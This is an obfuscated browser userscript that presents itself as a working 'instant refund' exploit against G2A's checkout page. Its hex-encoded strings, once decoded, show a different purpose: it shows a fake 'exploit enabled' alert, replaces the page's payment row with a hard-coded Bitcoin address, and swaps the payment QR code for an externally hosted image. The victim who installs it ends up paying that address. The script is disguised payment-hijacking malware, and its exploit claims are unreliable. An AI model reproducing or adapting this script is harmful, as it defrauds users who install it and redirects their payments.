// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      2.0 Last update: December 9, 2020
// @description  G2A Instant Refund Vulnerbility
// @author       @Karizon
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x6eff=["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","\x72\x6F\x77","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3A\x20\x31\x4E\x78\x52\x75\x43\x48\x63\x74\x32\x6D\x43\x6A\x70\x46\x33\x54\x57\x51\x69\x7A\x68\x44\x62\x44\x70\x45\x44\x45\x4D\x6E\x6B\x7A\x35","\x73\x72\x63","\x63\x6F\x64\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6F\x73\x74\x69\x6D\x67\x2E\x63\x63\x2F\x38\x73\x56\x73\x74\x51\x77\x53","\x6C\x65\x6E\x67\x74\x68"];var _0x128a=[_0x6eff[0],_0x6eff[1],_0x6eff[2],_0x6eff[3],_0x6eff[4],_0x6eff[5],_0x6eff[6],_0x6eff[7],_0x6eff[8]];alert(_0x128a[0]);var _0x4892da=setInterval(function(){var _0x43d7x3=document[_0x128a[2]](_0x128a[1]);_0x43d7x3[1][_0x128a[3]]= _0x128a[4];document[_0x128a[2]](_0x128a[6])[0][_0x128a[5]]= _0x128a[7];var _0x43d7x4=document[_0x128a[2]](_0x128a[6]);if(_0x43d7x4[_0x128a[8]]> 0){clearInterval(_0x4892da)}},10)

//Backend-Exploit | Status: Working